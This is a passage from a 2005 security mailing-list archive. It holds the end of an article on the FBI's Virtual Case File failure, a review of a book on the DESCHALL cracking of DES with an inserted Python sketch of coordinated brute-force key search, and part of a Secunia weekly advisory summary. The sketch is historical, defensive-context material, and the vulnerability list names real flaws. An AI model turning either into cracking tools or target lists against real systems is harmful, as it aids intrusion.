However, at the time, he was disruptive instead of constructive." In response to Higgins's concerns, FBI agents questioned Patton about whether he had disclosed national security information and breached his top-secret DOD clearance. "There was nothing in there that was sensitive material," Patton maintained. "It was just not flattering of the FBI and the project itself." After the interview, the FBI decided not to grant Patton top-secret clearance, making it impossible for him to continue working on the VCF. SAIC did invite him to find another position within the company, but it didn't have anything for him in Chicago, to which he was relocating for personal reasons. So at the end of November 2002, Patton left SAIC and the VCF. That same month the FBI and SAIC agreed to a basic set of requirements, the baseline that SAIC would start from to build the VCF. IN DECEMBER 2002, Higgins asked lawmakers to invest an additional $137.9 million in Trilogy and the inspector general issued a report on the FBI's management of information technology that included a case study of the program. It found that "the lack of critical IT investment management processes for Trilogy contributed to missed milestones and led to uncertainties about cost, schedule, and technical goals." Apparently unperturbed by the findings, Congress approved another $123.2 million for a project whose total cost had now ballooned to $581 million. Meanwhile, SAIC programmers were cranking out code. The company had settled on a spiral development methodology, an iterative approach to writing software. Basically, SAIC programmers would write and compile a block of code that performed a particular function, then run it to show Depew's agents what it would do. The agents - some of whom were working at SAIC's data center in Vienna, Va. - gave the programmers feedback, and the programmers tried to incorporate the suggested changes. 
If there was some dispute as to whether the change could or should be made, the agents sent an official request to the change control board, composed of SAIC engineers and FBI personnel, for review. It wasn't long before the change requests started rolling in - roughly 400 from December 2002 to December 2003, according to SAIC. "Once they saw the product of the code we wrote, then they would say, 'Oh, we've got to change this. That isn't what I meant,'" said SAIC's Reynolds. "And that's when we started logging change request after change request after change request." Reynolds added that SAIC's bid on the original contract, and each subsequently revised cost estimate, was based on there being "minimal, minor changes" to the program once a baseline set of requirements had been agreed on. Instead, SAIC engineers were like a construction crew working from a set of constantly changing blueprints. Some of the changes were cosmetic - move a button from one part of the screen to another, for instance. Others required the programmers to add a new function to a part of the program, such as the graphical user interface, common to all eight development threads. For example, according to SAIC engineers, after the eight teams had completed about 25 percent of the VCF, the FBI wanted a "page crumb" capability added to all the screens. Also known as "bread crumbs," a name inspired by the Hansel and Gretel fairy tale, this navigation device gives users a list of URLs identifying the path taken through the VCF to arrive at the current screen. This new capability not only added more complexity, the SAIC engineers said, but delayed development because completed threads had to be retrofitted with the new feature. Once SAIC engineers agreed on how the page crumbs would work, one of the development teams created a set of page-crumb-equipped screens for the other seven teams to use as a model. 
The design model and supporting documentation were updated, the teams made the change - and the schedule slipped again. When asked how SAIC programmers reacted to agents' change requests, Depew replied, "Let's just say that we gave them feedback on what they were developing, where it met the requirements and where it didn't. And there was a lot of inconsistency between their development teams." Higgins was aware that tensions were mounting inside the VCF project over the course of the winter and spring of 2003. Sometimes Depew's team had only two days to review a batch of code. Agents would pull all-nighters to get the evaluation finished, "and in the next iteration their comments wouldn't be taken into account," she said. Sometimes, she acknowledged, these evaluations would include changes to the requirements - functions that the agents had decided that they needed once they saw what they were going to get. Other times the FBI team would find bugs that needed to be fixed. In March 2003, Computer Sciences Corp., in El Segundo, Calif., which had acquired DynCorp that month, told Higgins that the final deployment of the computers and networks would be delayed until October. In August, October became December. And in October, December became April 2004. The problem wasn't the PCs, which had been trickling in since 2001, but changing the e-mail system from Novell's GroupWise to Microsoft Outlook and, according to the inspector general's 2005 audit, obtaining the components needed to connect the field offices to the wide area network. Higgins added that the delays were compounded by the FBI's own sloppy inventories of existing networks and its underestimation of how taxing the network traffic would be once all 22 000 users came online using their new PCs. While the FBI and SAIC waited for the networks to go live so they could test the VCF on a real system, changes and fixes continued to strangle the VCF in the crib. 
Many of the changes had to be made by all eight of SAIC's development teams. Arnold Punaro, SAIC executive vice president and general manager, admitted in a posting on the company's Web site that in the rush to get the program finished by December, SAIC didn't ensure that all of its programmers were making the changes the same way. That inconsistency occasionally meant that different modules of the VCF handled data in different ways. Consequently, when one module needed to communicate with another, errors sometimes occurred. "This, however, did not compromise the system," according to Punaro. The real killers, he said, were "significant management turbulence" at the FBI, "the ever-shifting nature of the requirements," and the agents' "trial-and-error, 'We will know it when we see it' approach to development." Through the summer of 2003, frustration between the agents and the engineers mounted. To quell tensions and discuss design flaws the agents believed were creeping into the VCF, Depew's team asked for a sit-down, what one agent called the "emperor has no clothes" meeting. One Sunday in late September, the agents and the engineers gathered to hash out their differences. Higgins listened in by phone to the first part of the day-long meeting. "There was an awful lot of anger on both sides and a lot of finger-pointing," she recalled. "Nobody's hands were clean." Depew, on the other hand, characterized the meeting as a frank exchange of views. "There was never any animosity shown by my team to the SAIC team," Depew said. Also in September, the U.S. General Accounting Office (renamed the Government Accountability Office on 7 July 2004) released a report titled "FBI Needs an Enterprise Architecture to Guide Its Modernization Activities." The GAO warned that without a blueprint that provides, in essence, the mother of all requirements documents, the bureau was exposing its modernization efforts, including the VCF, to unnecessary risk.
"I suspect what happened with the VCF is that in the rush to put in place a system, you think you got your requirements nailed, but you really don't," said GAO's Randolph C. Hite, who worked on the report. "It was a classic case of not getting the requirements sufficiently defined in terms of completeness and correctness from the beginning. And so it required a continuous redefinition of requirements that had a cascading effect on what had already been designed and produced." While stressing that there are no guarantees, Hite believes that "had there been an architecture, the likelihood of these requirements problems would have been vastly diminished." But the abundantly funded VCF juggernaut was already hurtling toward delivery. SAIC began testing the program in the fall of 2003, and according to Higgins, problems started cropping up, some of which the agents had warned SAIC about over the previous summer. SAIC officials complained to Higgins that Computer Sciences Corp. didn't have its hardware and network in place, so SAIC couldn't adequately test the VCF, crucial for a successful flash cutover. They informed her that they would deliver a version of the VCF to be in technical compliance with the terms of the contract and that the FBI should feel free to make changes to it afterward. "The feeling was, they knew that they weren't going to make it in December of '03," but they were not forthright about the fact, Higgins said. ON 13 DECEMBER 2003, SAIC delivered the VCF to the FBI, only to have it declared DOA. Under Azmi's direction, the FBI rejected SAIC's delivery of the VCF. The bureau found 17 "functional deficiencies" it wanted SAIC to fix before the system was deployed. As an April 2005 report from a U.S. House of Representatives committee pointed out, there were big deficiencies and small ones. One of the big ones was not providing the ability to search for individuals by specialty and job title. 
Among the small ones was a button on the graphical user interface that was labeled "State" that should have read "State/Province/Territory." SAIC argued that at least some of these deficiencies were changes in requirements. An arbitrator was called in. The arbitrator's findings, released on 12 March 2004, found fault with both SAIC and the FBI. Of the 59 issues and subissues derived from the original 17 deficiencies, the arbitrator found that 19 were requirements changes - the FBI's fault; the other 40 were SAIC's errors. While SAIC fixed bugs, Azmi, with the help of Depew's team, created investigation scenarios that would take different cases from opening to closing and tested them on the VCF. Those tests revealed an additional 400 deficiencies. "We have requirements that are not in the final product, yet we have capabilities in the final product that we don't have requirements for," Azmi said in an interview. On 24 March, days after the arbitrator's findings were released, Director Mueller testified to the Senate Committee on Appropriations' Subcommittee on Commerce, Justice, State, and the Judiciary that the VCF would be "on board" - and presumably operational - by the summer of 2004. The director had scant reason to be so optimistic. True, Computer Sciences Corp. was then delivering the final pieces of equipment to the FBI. By April, 22 251 computer workstations, 3408 printers, 1463 scanners, 475 servers, and new local and wide area networks would all be up and running, 22 months later than the accelerated schedule called for. But Azmi and SAIC had yet to agree on the VCF's ultimate fate, much less when it would be deployed. And when SAIC finally offered to take one more year to make all the changes the FBI wanted at the cost of an additional $56 million, Azmi rejected the proposal. Azmi was promoted from interim to permanent CIO on 6 May 2004.
Four days later, the Computer Science and Telecommunications Board of the National Research Council delivered a report on Trilogy that the FBI had commissioned. The "graybeards," as Mueller dubbed them, were led by James C. McGroddy, who had headed IBM Research from 1989 to 1995. The report made two major recommendations. The flash cutover that would start up the VCF and shut down ACS all at once must not happen, as a potential failure would be catastrophic for the bureau. And the FBI should create an enterprise architecture to guide the development of its IT systems. The same committee had made both of these recommendations in September 2002, and according to McGroddy, both suggestions had been ignored until Azmi took charge. Azmi invited the graybeards to talk with him, Mueller, Higgins, and a few other FBI officials on 20 May 2004. Azmi told the gathering that he had already contracted BearingPoint, where Robert Chiaradio was a managing director and lead advisor on homeland security, to construct the current and future versions of the enterprise architecture by September 2005. And he abandoned the flash cutover idea. In June, the FBI contracted an independent reviewer, Aerospace Corp., in El Segundo, Calif., to review the December 2003 delivery of the VCF to determine, among other things, whether the system requirements were correct and complete and to recommend what the FBI should do with the VCF. At the same time, Azmi asked SAIC to take the electronic workflow portion of the VCF, code that was in relatively good shape, and turn that into what was eventually called the Initial Operating Capability (IOC), at an additional fixed price to the FBI of $16.4 million. SAIC and the FBI project team had six months to deliver a software package that would be deployed to between 250 and 500 field personnel in the New Orleans field office, the Baton Rouge, La., resident agency, and a drug enforcement unit at the Hoover Building. 
The objectives for the new project were clear: test-drive the VCF's electronic workflow; see how people reacted to the graphical user interface; create a way to translate the output from the VCF forms, which was in the eXtensible Markup Language, into the ACS system; check out network performance; and develop a training program. The IOC was the perfect guinea pig for Azmi's rigorous approach to software development and project management, which he called the Life Cycle Management Directive. The project also needed different managers. On SAIC's side, Rick Reynolds assumed executive oversight on the project from Brice Zimmerman. Reynolds replaced VCF project manager Pat Boyle with Charlie Kanewske. (SAIC declined repeated requests to interview them.) Depew, like other FBI officials, had only good things to say about Kanewske. He had been Kanewske's project manager counterpart for a portion of the Investigative Data Warehouse project, the newest, shiniest tool at the disposal of FBI agents and intelligence analysts. Successfully deployed in January 2004, the warehouse translates and stores data from several FBI databases, including parts of ACS, into a common form and structure for analysis. But Depew would not be Kanewske's counterpart for the IOC project. He moved back to New Jersey, where he became director of the FBI's New Jersey Regional Computer Forensic Laboratory. When interviewed this past spring, he was overseeing the lab's daily operations and construction of a new wing. He was also anticipating retirement after 31 years of public service and thinking of pursuing job opportunities in the private sector. His final take on the VCF was to the point: "We wanted it really bad, and at the end it was really bad." As for Sherry Higgins, she went back home to Georgia before the IOC project launched. She now consults and teaches project management courses for the International Institute for Learning Inc., in New York City. 
"When it's not fun anymore, Sherry's not a happy girl," Higgins said of her mood just prior to her departure. "The writing was on the wall that IOC was going to be Zal's project. And I just felt like it would be better for me and for Zal for me to leave." Azmi handpicked his IOC project manager. He chose the bureau's gadget guru (think of "Q" from the James Bond movies) - a man with 20 years of experience delivering surveillance technologies on tight schedules. At a meeting this past May at the Hoover Building, the IOC project manager, whom the bureau made available on condition of anonymity, let me read through an internal FBI report on the IOC and explained the development process in detail. He stressed that the IOC was never meant to be deployed to all 28 000 FBI employees but was intended to test Azmi's methodology. "We followed all of this [process], even in this aggressive timeline, to prove he's got a good framework for managing these projects," he said. With new management in place, about 120 SAIC engineers began work on the IOC project in June 2004. The FBI and SAIC agreed to keep to a strict development schedule, define acceptance criteria, and institute a series of control gates - milestones SAIC would have to meet before the project could continue. Azmi, unlike the previous three CIOs, inserted himself into the day-to-day operations of the IOC project. All through the second half of 2004, he met with his project manager every morning at 8:15. Every night before 10 p.m., the project manager would issue a status report indicating what milestones had been hit, identifying risks, and suggesting actions to be taken to avoid mistakes and delays. Azmi's project manager worked closely with Kanewske to adhere to the baseline requirements SAIC and the FBI had agreed on for the IOC in July, thus avoiding a death spiral of change requests.
In January, the IOC was rolled out as a pilot right on schedule, and just before the inspector general's stinging critique of the VCF was released. The report on the VCF from Aerospace Corp., the $2 million study of the December 2003 delivery commissioned by the FBI, began circulating on Capitol Hill at the same time. [Spectrum's attempt to obtain a copy of the report under the Freedom of Information Act was still being litigated at press time.] But during a hearing this past 3 February, Senator Judd Gregg (R-N.H.) disclosed that the report said that "the [VCF] architecture was developed without adequate assessment of alternatives and conformance to various architectural standards, and in a way that precluded the incorporation of significant commercial off-the-shelf software." Furthermore, "high-level documents, including the concept of operations, systems architecture, and system requirements were neither complete nor consistent, and did not map to user needs." Finally, "the requirements and design documentation were incomplete, imprecise, requirements and design tracings have gaps, and the software cannot be maintained without difficulty. And it is therefore unfit for use." The IOC pilot, meanwhile, ended in March. The verdict: "Although the IOC application was an aid to task management, its use did not improve the productivity of most users," according to an internal FBI assessment. When asked why the IOC did not improve productivity, the FBI project manager emphasized, "The goal was not to achieve improved productivity. What we learned through this is that when they deploy the work flow, there's a need to roll out an electronic records management capability simultaneously." In other words, FBI employees, particularly agents, found that the IOC actually increased their workload. Why? 
Agents filled out forms electronically and routed them to superiors for approval, after which the electronic form was uploaded to the ACS, still in use, to be shared with the rest of the FBI. But to comply with the FBI's paper-based records management system, the form had to be printed out, routed, signed, and filed. So what did the FBI get out of the VCF's last gasp? "We harvested some of the good work from the past," the FBI project manager told me. "We focused that into a pilot. We tested that life-cycle development model of Zal's, and that is a valid, repeatable process. And now we're in a good position to move on." FBI officials say they are taking what they learned from the VCF and charging ahead with new IT projects on two major fronts. Last September, the White House's Office of Management and Budget tapped the bureau to spearhead the development of a framework for a Federal Investigative Case Management System, an effort involving the National Institutes of Health and the departments of Justice and Homeland Security. The goal here is to provide a guide for any agency in the federal government to use when creating a case-management system. Then, late last May, Mueller announced Sentinel, a four-phase, four-year project intended to do the VCF's job and provide the bureau with a Web-based case- and records-management system that incorporates commercial off-the-shelf software. Sentinel's estimated cost remains a secret. The bureau expects to award the contract for phase one by the end of this year for delivery by December 2006. SAIC is one of only a handful of preapproved government contractors eligible to bid on the project. The FBI's Azmi seems confident that the bureau is ready to handle a project as complex as Sentinel. He said that the FBI has been planning the program for a year, evaluating commercial off-the-shelf software, creating an enterprise architecture, and establishing a number of IT management oversight boards. 
The bureau has also provided project management training to 80 IT staff members over the last year. Even so, Ken Orr, an IT systems architect and one of Mueller's graybeards, remains skeptical. He rated Sentinel's chances of success as very low. "The sheer fact that they made that kind of announcement about Sentinel shows that they really haven't learned anything," Orr said, from his office in Topeka, Kan. "To say that you're going to go out and buy something and have it installed within a year, based on their track record," isn't credible. "They need to sit down and really plan this out, because if they had working software today, they'd have only 25 percent of the problem solved," Orr estimated. The major questions the FBI needs to answer, he contended, include how to bring these new software programs online incrementally and train more than 30,000 people to use them. Then they could focus on converting millions of paper records as well as all of the audio, video, photographic, and physical evidence that has piled up over the years, which will continue to grow at an increasing rate to support the bureau's counterterrorism mission. "I would guess that it would be closer to 2010 or 2011 before they have the complete system up and running," Orr said. "That's assuming that you have a match between the software and the underlying requirements, which we know are subject to change."

From isn at c4i.org Sat Sep 10 00:27:51 2005
From: isn at c4i.org (InfoSec News)
Date: Sat Sep 10 00:37:41 2005
Subject: [ISN] Book Review: Brute Force - Cracking the Data Encryption Standard
Message-ID:

http://books.slashdot.org/books/05/09/08/1653245.shtml

[ http://www.amazon.com/exec/obidos/ASIN/0387201092/c4iorg - WK]

Author: Matt Curtin
Pages: 291
Publisher: Copernicus Books
Rating: 9
Reviewer: Isaac Jones
ISBN: 0387201092
Summary: Volunteers working collaboratively over the internet manage to crack the Data Encryption Standard.
Although I wasn't involved with the DES cracking challenge, I am friends with the author of this book. I took a Lisp course from Matt at Ohio State University and I'll be forever grateful that Matt introduced me to functional programming with a great deal of humor and enthusiasm. I don't think I've ever seen Matt stay so serious for so long, but his enthusiasm comes through clearly in this book. Brute Force can be enjoyed by both nerds and non-nerds interested in cryptography or codes. Those who have been a part of this or subsequent DES challenges may be particularly interested in this book. Curtin covers some technical details of DES and the brute force attack that the DESCHALL team used to discover a DES key. He also discusses the political and historical significance of this event. This is a fairly technical book, but it goes out of its way to explain non-obvious technical topics, so one doesn't need a lot of technical background to understand it. Curtin briefly explains a lot of stuff: the C programming language, firewalls, UDP, one-time pads, protected memory, etc., in order to make this book readable for novices. Although I generally did not need such explanations, I did not find them annoying or distracting, as they were fairly brief. In fact, it's fun to read concise explanations of such topics. Occasionally, Curtin does go into just a little too much detail. The chapter on Architecture gives an explanation of some of the many pieces of software that were involved in this effort. This chapter sometimes gets a bit bogged down with explanations of useful scripts that folks wrote to analyze data or forward packets through firewalls. Brute Force is a very readable and enjoyable book. It is well organized as a narrative, though it is not chronological; Curtin presents the background and substance to each aspect of the story together, rather than chronologically. This can be slightly confusing sometimes, but I think it improves the over-all flow of the story. 
In a way, Curtin gives away the ending to the book at the beginning (and in the title), but this isn't ancient history, and most readers will probably already know that DES was defeated by this effort. He still manages to maintain a good sense of suspense throughout the book. He presents tables and analysis of the effort, along with predictions about completion dates that volunteers had made at the time. Unfortunately, he doesn't tell us whether those tables turned out to be correct. What percentage of the keyspace was searched by Macintoshes? How many different kinds of client machines were there in the end? Did Ohio State University try more keys than Oregon State University? Which one is the real OSU? One of the main themes running throughout the book was that of community. The DESCHALL project was made up of thousands of volunteers from all over the US. Anyone with some spare CPU cycles could get involved by downloading the client software. This may remind you of other distributed computing projects like SETI@home. The community was further broken down into sub-groups like schools who would compete for bragging rights. The organization of the DESCHALL project was much like an open source project, though the key-cracking tools were not open source. Spreading the Word is a chapter about how people started to hear about DESCHALL and what the earliest adopters were like. Some of the tables in a later chapter list the operating system and hardware that the clients were running, which was a pretty cool snapshot of the Internet from 1997. It included lots of OS/2 clients, labs full of SGI machines, and plenty of computers which were only connected to the Internet via dial-up modems. Special scripts were developed for such machines so they could phone home when they needed a new block of keys. Though the key cracking clients were not open source, they were free as in beer, at least for Americans. 
Since such cryptography-related software could not be exported at the time, this was a US-only effort. There was a European team, however, with their own software, called SolNet, and Curtin keeps us updated on their progress. In fact the DESCHALL project had an impact on the political debate of this time with regard to the export and control of cryptographic technologies. Curtin gives us interesting periodic updates on the political debate as the DES cracking story moves forward. Cryptography control was defeated at that time, but the use of cryptography is a right that will need continued protection. The political story of DESCHALL was one aspect of the historical impact of the project. Another impact was the explosion of volunteer distributed computing networks after the DESCHALL project, with SETI@home being one of the most obvious examples. DESCHALL clearly demonstrated the viability of this kind of computation. Curtin touches briefly on this here and there, but does not go into detail. I would like him to more clearly spell out the trends in Internet distributed computing. I would like to hear that DESCHALL was derived from project A and that it inspired projects B, C, and D. Was it the original Internet distributed computing network? Was it a fad that has abated in the last few years? Curtin touches on this a bit, but says, "Some other distributed computing projects like DESCHALL were around," (pg 200). He says which ones, but doesn't make any claims that DESCHALL inspired SETI@home, for instance. Perhaps such things are never quite clear in the free exchange of ideas on the Internet. The political and community aspects of the story wrap up very nicely. Curtin outlines DESCHALL's impact on driving the AES standard, and its (perhaps much smaller) impact on the debates on key escrow and encryption exports. Brute Force is a very enjoyable read about an important event, and I can happily recommend my friend Matt's book to the Slashdot crowd.
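The client/server arrangement the review describes, as an added example that is not code from the book, from the DESCHALL project or from the reviewer: a coordinator hands out fixed-size blocks of the 56-bit DES keyspace, a client expands each counter in its block into a parity-correct 8-byte DES key and tests it, and a block whose client never phones home again is re-issued to someone else. The block size, the lease timing, the client names and the stand-in `is_correct_key` oracle are assumptions made here; a real client would decrypt the challenge ciphertext under each candidate key with an actual DES implementation, which this example does not include.

```python
"""DESCHALL-style coordinated brute-force key search, in miniature.

Added example; this is not code from the book or from the DESCHALL project.
Constructed assumptions: the block size, the lease/reassignment bookkeeping,
the client names and the stand-in key oracle are all invented here.
"""

DES_KEY_BITS = 56      # DES has 56 effective key bits ...
DES_KEY_BYTES = 8      # ... carried in 8 bytes, each with one parity bit


def index_to_des_key(index: int) -> bytes:
    """Expand a 56-bit search counter into an 8-byte DES key.

    In each key byte the high seven bits are key material and the low bit is
    a parity bit chosen so the byte has an odd number of set bits.  A searcher
    counts 0 .. 2**56-1 and expands each counter this way.
    """
    if not 0 <= index < 1 << DES_KEY_BITS:
        raise ValueError("index outside the 56-bit DES keyspace")
    key = bytearray()
    for i in range(DES_KEY_BYTES):
        shift = 7 * (DES_KEY_BYTES - 1 - i)        # most significant 7 bits first
        byte = ((index >> shift) & 0x7F) << 1
        if bin(byte).count("1") % 2 == 0:          # make the popcount odd
            byte |= 1
        key.append(byte)
    return bytes(key)


def has_odd_parity(key: bytes) -> bool:
    """True if every byte of a DES key carries correct (odd) parity."""
    return len(key) == DES_KEY_BYTES and all(bin(b).count("1") % 2 for b in key)


class KeyServer:
    """Hands out blocks of the keyspace and re-issues blocks nobody reported on."""

    def __init__(self, block_bits: int, lease_seconds: float):
        self.block_bits = block_bits
        self.total_blocks = 1 << (DES_KEY_BITS - block_bits)
        self.lease_seconds = lease_seconds
        self.next_block = 0
        self.leased = {}          # block_id -> (client, deadline)
        self.done = set()
        self.found = None

    def block_range(self, block_id: int):
        start = block_id << self.block_bits
        return start, start + (1 << self.block_bits)

    def request_block(self, client: str, now: float):
        """Return a block id to search, or None when the search is over."""
        if self.found is not None:
            return None
        # A block whose lease expired (a dial-up client that never phoned
        # home again) is re-issued before fresh keyspace is handed out.
        for block_id, (_, deadline) in list(self.leased.items()):
            if now > deadline:
                self.leased[block_id] = (client, now + self.lease_seconds)
                return block_id
        if self.next_block >= self.total_blocks:
            return None
        block_id = self.next_block
        self.next_block += 1
        self.leased[block_id] = (client, now + self.lease_seconds)
        return block_id

    def report(self, client: str, block_id: int, found_key=None) -> bool:
        """Accept a result only from the client currently holding the lease."""
        holder = self.leased.get(block_id, (None, None))[0]
        if holder != client:
            return False              # stale, duplicated or forged report
        del self.leased[block_id]
        self.done.add(block_id)
        if found_key is not None:
            self.found = found_key
        return True


def search_block(server: KeyServer, block_id: int, is_correct_key):
    """Client side: try every key in the block against the oracle."""
    start, end = server.block_range(block_id)
    for index in range(start, end):
        key = index_to_des_key(index)
        if is_correct_key(key):
            return key
    return None


# Constructed target.  A real client would DES-decrypt the challenge
# ciphertext under each candidate key and compare with the known plaintext;
# this example stands in for that with a direct comparison.
SECRET_KEY = index_to_des_key(785)


def run_demo():
    """Two clients: 'b' takes a block and vanishes, 'a' keeps working."""
    server = KeyServer(block_bits=8, lease_seconds=60)
    now = 0.0
    server.request_block("b", now)                 # block 0, never reported
    a_blocks, found = [], None
    while found is None:
        now += 30.0                                # constructed pacing
        block_id = server.request_block("a", now)
        if block_id is None:
            break
        a_blocks.append(block_id)
        found = search_block(server, block_id, lambda k: k == SECRET_KEY)
        server.report("a", block_id, found)
    late = server.request_block("c", now)          # search already over
    return {"key": found, "a_blocks": a_blocks, "late": late,
            "done": sorted(server.done)}
```

In `run_demo()` client "a" works blocks 1 and 2, then at the 90-second mark inherits block 0 because "b" let its lease lapse, and finds the key in block 3; a client that shows up afterwards gets nothing. The `report()` check that only the current lease holder can close a block is what keeps a dropped or duplicated client from silently marking keyspace as searched.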
My only criticisms can really be summed up by saying, "I want to hear more."

From isn at c4i.org Sat Sep 10 00:28:47 2005
From: isn at c4i.org (InfoSec News)
Date: Sat Sep 10 00:38:05 2005
Subject: [ISN] Secunia Weekly Summary - Issue: 2005-36
Message-ID:

========================================================================

                  The Secunia Weekly Advisory Summary
                        2005-09-01 - 2005-09-08

                       This week : 60 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

The Secunia staff is spending hours every day to assure you the best and most reliable source for vulnerability information. Every single vulnerability report is being validated and verified before a Secunia advisory is written.

Secunia validates and verifies vulnerability reports in many different ways e.g. by downloading the software and performing comprehensive tests, by reviewing source code, or by validating the credibility of the source from which the vulnerability report was issued.

As a result, Secunia's database is the most correct and complete source for recent vulnerability information available on the Internet.

Secunia Online Vulnerability Database:
http://secunia.com/

========================================================================
2) This Week in Brief:

Secunia Research has discovered a vulnerability in ALZip, which can be exploited by malicious people to compromise a vulnerable system.

Additional details can be found in the referenced Secunia advisory.
Reference:
http://secunia.com/SA16479

VIRUS ALERTS:

Secunia has not issued any virus alerts during the week.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA16686] OpenSSH Two Security Issues
2. [SA16661] Gentoo update for phpwebsite
3. [SA16560] Windows Registry Editor Utility String Concealment Weakness
4. [SA16480] Microsoft DDS Library Shape Control Code Execution Vulnerability
5. [SA16466] Adobe Acrobat / Reader Plug-in Buffer Overflow Vulnerability
6. [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability
7. [SA16653] Symantec Anti-Virus LiveUpdate Credentials Disclosure
8. [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerabilities
9. [SA16700] mod_ssl "SSLVerifyClient" Security Bypass Security Issue
10. [SA16683] Barracuda Spam Firewall Multiple Vulnerabilities

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA16722] WebArchiveX ActiveX Control Insecure Methods
[SA16698] Free SMTP Server Open Mail Relay Vulnerability
[SA16685] Rediff Bol Exposure of Windows Address Book
[SA16684] N-Stealth Security Scanner "Server" Header Script Insertion
[SA16678] SlimFTPd Denial of Service Vulnerability
[SA16666] Savant Web Server Exposure of User Credentials

UNIX/Linux:
[SA16714] Ubuntu Updates for Multiple Packages
[SA16697] Gentoo update for openttd
[SA16696] OpenTTD Format String and Buffer Overflow Vulnerabilities
[SA16675] Debian update for webcalendar
[SA16670] Debian update for phpgroupware
[SA16723] Mandriva update for mplayer
[SA16709] Fedora update for squid
[SA16708] Squid "storeBuffer()" Denial of Service Vulnerability
[SA16705] Red Hat update for httpd
[SA16704] SqWebMail Conditional Comments Script Insertion Vulnerability
[SA16700] mod_ssl "SSLVerifyClient" Security Bypass Security Issue
[SA16694] Gentoo update for gnumeric
[SA16690] Debian update for zsync
[SA16689] Debian update for affix
[SA16681] Debian update for proftpd
[SA16679] Debian update for pcre3
[SA16677] Trustix update for multiple packages
[SA16674] Squid "sslConnectTimeout()" Denial of Service Vulnerability
[SA16672] zsync Multiple zlib Vulnerabilities
[SA16737] Avaya Intuity Audix cpio Directory Traversal Vulnerability
[SA16702] Gentoo update for phpldapadmin
[SA16701] UnixWare ICMP Message Handling Denial of Service
[SA16686] OpenSSH Two Security Issues
[SA16676] Trustix update for cups
[SA16730] DCC dccifd Proxy Mode Denial of Service
[SA16736] Mandriva update for smb4k
[SA16724] Smb4k Insecure Temporary File Handling Vulnerability
[SA16720] Ubuntu update for kdebase-bin
[SA16716] Mandriva update for kdeedu
[SA16715] Mandriva update for kdebase
[SA16703] Fedora update for perl-DBI
[SA16695] Gentoo update for net-snmp
[SA16692] KDE kcheckpass Insecure Lock File Creation Vulnerability
[SA16725] Debian update for cvs
[SA16706] Red Hat update for cvs
[SA16687] Debian update for ntp
[SA16680] URBAN Symlink and Multiple Local Buffer Overflow Vulnerabilities
[SA16673] Debian update for polygen
[SA16671] Polygen Output Files Insecure Permissions Weakness

Other:
[SA16683] Barracuda Spam Firewall Multiple Vulnerabilities

Cross Platform:
[SA16707] GuppY Multiple Vulnerabilities
[SA16693] MAXdev MD-Pro Multiple Vulnerabilities
[SA16682] WebGUI Perl Code Execution Vulnerabilities
[SA16733] Symantec Brightmail AntiSpam Denial of Service Vulnerabilities
[SA16731] MAXdev MD-Pro Cross-Site Scripting and File Upload Vulnerabilities
[SA16726] Unclassified NewsBoard "Description" Script Insertion Vulnerability
[SA16721] phpCommunityCalendar Multiple Vulnerabilities
[SA16710] Land Down Under "neventtext" Script Insertion Vulnerability
[SA16699] myBloggie "username" SQL Injection Vulnerability
[SA16669] Nikto "Server" Header Script Insertion Vulnerability
[SA16667] Phorum "Username" Script Insertion Vulnerability
[SA16734] Open WebMail "sessionid" Cross-Site Scripting Vulnerability
[SA16668] gBook Unspecified Cross-Site Scripting Vulnerabilities
[SA16688] Apache PCRE Integer Overflow Vulnerability


========================================================================
5) Vulnerabilities Content Listing

Windows:
--

[SA16722] WebArchiveX ActiveX Control Insecure Methods

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2005-09-07

Brett Moore has reported a vulnerability in WebArchiveX, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16722/

--

[SA16698] Free SMTP Server Open Mail Relay Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass
Released:    2005-09-05

basher13 has discovered a vulnerability in Free SMTP Server, which can be exploited by malicious people to use it as an open mail relay.

Full Advisory:
http://secunia.com/advisories/16698/

--

[SA16685] Rediff Bol Exposure of Windows Address Book

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2005-09-05

Gregory R. Panakkal has discovered a security issue in Rediff Bol, which can be exploited by malicious people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/16685/

--

[SA16684] N-Stealth Security Scanner "Server" Header Script Insertion

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2005-09-02

Mariano Nunez Di Croce has reported a vulnerability in N-Stealth Security Scanner, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/16684/

--

[SA16678] SlimFTPd Denial of Service Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2005-09-02

Critical Security has discovered a vulnerability in SlimFTPd, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/16678/

--

[SA16666] Savant Web Server Exposure of User Credentials

Critical:    Less critical
Where:       Local system
Impact:      Exposure of sensitive information
Released:    2005-09-02

basher13 has discovered a security issue in Savant Web Server, which can be exploited by malicious, local users to disclose potentially sensitive information.

Full Advisory:
http://secunia.com/advisories/16666/


UNIX/Linux:
--

[SA16714] Ubuntu Updates for Multiple Packages

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, DoS, System access
Released:    2005-09-07

Ubuntu has issued updates for multiple packages. These fix various vulnerabilities and security issues, which can be exploited by malicious people to cause a DoS (Denial of Service), and potentially bypass certain security restrictions or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16714/

--

[SA16697] Gentoo update for openttd

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-09-06

Gentoo has issued an update for openttd. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/16697/

--

[SA16696] OpenTTD Format String and Buffer Overflow Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2005-09-06

Alexey Dobriyan has reported some vulnerabilities in OpenTTD, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

